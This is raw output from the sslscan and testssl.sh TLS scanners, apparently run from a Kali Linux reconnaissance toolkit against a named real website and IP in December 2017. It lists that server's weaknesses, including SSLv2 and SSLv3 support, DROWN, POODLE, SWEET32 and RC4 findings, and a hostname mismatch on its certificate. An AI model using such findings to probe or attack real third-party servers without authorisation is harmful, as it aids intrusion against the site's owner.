OpenSSL 1.0.2-chacha (1.0.2g-dev)
[0m
Testing SSL server [32mdoctorarik.co.il[0m on port [32m443[0m using SNI name [32mdoctorarik.co.il[0m

  [1;34mTLS Fallback SCSV:[0m
Server [31mdoes not[0m support TLS Fallback SCSV

  [1;34mTLS renegotiation:[0m
[32mSecure[0m session renegotiation supported

  [1;34mTLS Compression:[0m
Compression [32mdisabled[0m

  [1;34mHeartbleed:[0m
TLS 1.2 [32mnot vulnerable[0m to heartbleed
TLS 1.1 [32mnot vulnerable[0m to heartbleed
TLS 1.0 [32mnot vulnerable[0m to heartbleed

  [1;34mSupported Server Cipher(s):[0m
[32mPreferred[0m [33mTLSv1.0[0m  [32m128[0m bits  AES128-SHA
Accepted  [33mTLSv1.0[0m  [32m256[0m bits  AES256-SHA
Accepted  [33mTLSv1.0[0m  [32m128[0m bits  [33mRC4-SHA                      [0m
Accepted  [33mTLSv1.0[0m  [32m112[0m bits  [33mDES-CBC3-SHA                 [0m
Accepted  [33mTLSv1.0[0m  [32m128[0m bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  [33mTLSv1.0[0m  [32m256[0m bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  [33mTLSv1.0[0m  [32m128[0m bits  [33mRC4-MD5                      [0m
[32mPreferred[0m [31mSSLv3[0m    [32m128[0m bits  [33mRC4-SHA                      [0m
Accepted  [31mSSLv3[0m    [32m112[0m bits  [31mDES-CBC3-SHA                 [0m
Accepted  [31mSSLv3[0m    [32m128[0m bits  [33mRC4-MD5                      [0m
[32mPreferred[0m [31mSSLv2[0m    [32m128[0m bits  [33mRC4-MD5                      [0m
Accepted  [31mSSLv2[0m    [32m112[0m bits  [33mDES-CBC3-MD5                 [0m

  [1;34mSSL Certificate:[0m
Signature Algorithm: [32msha256WithRSAEncryption[0m
RSA Key Strength:    2048

Subject:  negba.dtnt.info
Altnames: DNS:negba.dtnt.info
Issuer:   thawte DV SSL CA - G2

Not valid before: [32mFeb  5 00:00:00 2017 GMT[0m
Not valid after:  [32mMar  7 23:59:59 2018 GMT[0m
[1m
###########################################################
    testssl       2.9dev from [m[1mhttps://testssl.sh/dev/[m
[1m
      This program is free software. Distribution and
             modification under GPLv2 permitted.
      USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!

       Please file bugs @ [m[1mhttps://testssl.sh/bugs/[m
[1m
###########################################################[m

 Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
 on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
 (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")


[7m Start 2017-12-30 23:40:22        -->> 62.219.91.10:443 (doctorarik.co.il) <<--[m

 rDNS (62.219.91.10):    cust-62-219-91-10.cust.bezeqint.net.
 Service detected:       Couldn't determine what's running on port 443, assuming no HTTP service => skipping all HTTP checks


[1m[4m Testing protocols [m[4mvia sockets except SPDY+HTTP2 [m

[1m SSLv2      [m[1;31moffered (NOT ok), also VULNERABLE to DROWN attack[m -- 2 ciphers
[1m SSLv3      [m[0;31moffered (NOT ok)[m
[1m TLS 1      [moffered
[1m TLS 1.1    [mnot offered
[1m TLS 1.2    [m[0;33mnot offered[m[0;33m -- strange, server closed TCP connection [m
[1m TLS 1.3    [mnot offered
[1m SPDY/NPN   [mnot offered
[1m HTTP2/ALPN [mnot offered

[1m[4m Testing ~standard cipher categories [m

[1m NULL ciphers (no encryption)                  [m[1;32mnot offered (OK)[m
[1m Anonymous NULL Ciphers (no authentication)    [m[1;32mnot offered (OK)[m
[1m Export ciphers (w/o ADH+NULL)                 [m[1;32mnot offered (OK)[m
[1m LOW: 64 Bit + DES encryption (w/o export)     [m[1;32mnot offered (OK)[m
[1m Weak 128 Bit ciphers (SEED, IDEA, RC[2,4])    [m[0;31moffered (NOT ok)[m
[1m Triple DES Ciphers (Medium)                   [m[0;33moffered[m
[1m High encryption (AES+Camellia, no AEAD)       [m[0;32moffered (OK)[m
[1m Strong encryption (AEAD ciphers)              [m[0;33mnot offered[m


[1m[4m Testing robust (perfect) forward secrecy[m[4m, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 [m

[0;32m PFS is offered (OK)[m          ECDHE-RSA-AES256-SHA ECDHE-RSA-AES128-SHA
[1m Elliptic curves offered:     [m[0;32mprime256v1[m [0;32msecp384r1[m


[1m[4m Testing server preferences [m

[1m Has server cipher order?     [m[1;32myes (OK)[m
[1m Negotiated protocol          [mTLSv1
[1m Negotiated cipher            [m[1;33mAES128-SHA[m
[1m Cipher order[m
    SSLv3:     RC4-SHA DES-CBC3-SHA RC4-MD5
    TLSv1:     AES128-SHA AES256-SHA RC4-SHA DES-CBC3-SHA ECDHE-RSA-AES128-SHA
               ECDHE-RSA-AES256-SHA RC4-MD5


[1m[4m Testing server defaults (Server Hello) [m

[1m TLS extensions (standard)    [m"status request/#5" "renegotiation info/#65281"
[1m Session Ticket RFC 5077 hint [m(no lifetime advertised)
[1m SSL Session ID support       [myes
[1m Session Resumption           [mTickets: yes, ID: yes
[1m TLS clock skew[m               -4 sec from localtime
[1m Signature Algorithm          [m[0;32mSHA256 with RSA[m
[1m Server key size              [mRSA 2048 bits
[1m Fingerprint / Serial         [mSHA1 0BB7413C950A275DF33377BF39362D6DB2075E5C / 239E30BA064D957DE0A47B7B0508C258
                              SHA256 D4B63BA4B0EB88CB74B56246F047B7949CC3B770AFF2B9F510D98F9A51334E1A
[1m Common Name (CN)             [m[3mnegba.dtnt.info[m
[1m subjectAltName (SAN)         [m[3mnegba.dtnt.info [m
[1m Issuer                       [m[3mthawte DV SSL CA - G2[m ([3mthawte, Inc.[m from [3mUS[m)
[1m Trust (hostname)             [m[0;31mcertificate does not match supplied URI[m (same w/o SNI)
[1m Chain of trust[m               [0;32mOk   [m[0;35m[m
[1m EV cert[m (experimental)       no
[1m Certificate Expiration       [m[0;32m66 >= 60 days[m (2017-02-04 19:00 --> 2018-03-07 18:59 -0500)
[1m # of certificates provided[m   2
[1m Certificate Revocation List  [mhttp://tn.symcb.com/tn.crl
[1m OCSP URI                     [mhttp://tn.symcd.com
[1m OCSP stapling                [m[0;32moffered[m
[1m OCSP must staple             [mno
[1m DNS CAA RR[m (experimental)    [1;33mnot offered[m
[1m Certificate Transparency     [m[0;32myes[m (certificate extension)


[1m[4m Testing vulnerabilities [m

[1m Heartbleed[m (CVE-2014-0160)                [1;32mnot vulnerable (OK)[m, no heartbeat extension
[1m CCS[m (CVE-2014-0224)                       [1;32mnot vulnerable (OK)[m
[1m Ticketbleed[m (CVE-2016-9244), experiment.  --   (applicable only for HTTPS)
[1m ROBOT                                     [m[1;32mnot vulnerable (OK)[m
[1m Secure Renegotiation [m(CVE-2009-3555)      [1;32mnot vulnerable (OK)[m
[1m Secure Client-Initiated Renegotiation     [m[0;32mnot vulnerable (OK)[m
[1m CRIME, TLS [m(CVE-2012-4929)                [0;32mnot vulnerable (OK)[m (not using HTTP anyway)
[1m POODLE, SSL[m (CVE-2014-3566)               [0;31mVULNERABLE (NOT ok)[m, uses SSLv3+CBC (check TLS_FALLBACK_SCSV mitigation below)
[1m TLS_FALLBACK_SCSV[m (RFC 7507)              [0;31mDowngrade attack prevention NOT supported and vulnerable to POODLE SSL[m
[1m SWEET32[m (CVE-2016-2183, CVE-2016-6329)    [1;33mVULNERABLE[m, uses 64 bit block ciphers
[1m FREAK[m (CVE-2015-0204)                     [1;32mnot vulnerable (OK)[m
[1m DROWN[m (CVE-2016-0800, CVE-2016-0703)      [1;31mVULNERABLE (NOT ok), SSLv2 offered with 2 ciphers[m
                                           Make sure you don't use this certificate elsewhere, see:
                                           https://censys.io/ipv4?q=D4B63BA4B0EB88CB74B56246F047B7949CC3B770AFF2B9F510D98F9A51334E1A
[1m LOGJAM[m (CVE-2015-4000), experimental      [0;32mnot vulnerable (OK):[m no DH EXPORT ciphers, no DH key detected
[1m BEAST[m (CVE-2011-3389)                     SSL3: [0;33mDES-CBC3-SHA [m
                                           TLS1: [0;33mAES128-SHA AES256-SHA
                                                 DES-CBC3-SHA
                                                 ECDHE-RSA-AES128-SHA
                                                 ECDHE-RSA-AES256-SHA [m
                                           [0;33mVULNERABLE[m -- and no higher protocols as mitigation supported
[1m LUCKY13[m (CVE-2013-0169), experimental     potentially [1;33mVULNERABLE[m, uses cipher block chaining (CBC) ciphers with TLS
[1m RC4[m (CVE-2013-2566, CVE-2015-2808)        [0;31mVULNERABLE (NOT ok): [m[0;31mRC4-SHA RC4-MD5
                                                                RC4-MD5 [m


[1m[4m Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength [m

Hexcode  Cipher Suite Name (OpenSSL)       KeyExch.   Encryption  Bits     Cipher Suite Name (RFC)
-----------------------------------------------------------------------------------------------------------------------------
 xc014   ECDHE-RSA-AES256-SHA              ECDH[0;32m 256[m   AES         256      TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
 x35     AES256-SHA                        RSA        AES         256      TLS_RSA_WITH_AES_256_CBC_SHA
 xc013   ECDHE-RSA-AES128-SHA              ECDH[0;32m 256[m   AES         128      TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
 x2f     AES128-SHA                        RSA        AES         128      TLS_RSA_WITH_AES_128_CBC_SHA
 x05     RC4-SHA                           RSA        RC4         128      TLS_RSA_WITH_RC4_128_SHA
 x04     RC4-MD5                           RSA        RC4         128      TLS_RSA_WITH_RC4_128_MD5
 x010080 RC4-MD5                           RSA        RC4         128      SSL_CK_RC4_128_WITH_MD5
 x0a     DES-CBC3-SHA                      RSA        3DES        168      TLS_RSA_WITH_3DES_EDE_CBC_SHA
 x0700c0 DES-CBC3-MD5                      RSA        3DES        168      SSL_CK_DES_192_EDE3_CBC_WITH_MD5

Could not determine the protocol, only simulating generic clients.

[1m[4m Running client simulations via sockets [m

 Java 6u45                    TLSv1.0 AES128-SHA
 Java 7u25                    TLSv1.0 AES128-SHA
 Java 8u31                    TLSv1.0 AES128-SHA
 OpenSSL 1.0.1l               TLSv1.0 AES128-SHA
 OpenSSL 1.0.2e               TLSv1.0 AES128-SHA

[7m Done 2017-12-30 23:48:37 [ 498s] -->> 62.219.91.10:443 (doctorarik.co.il) <<--[m
#######################################################################################################################################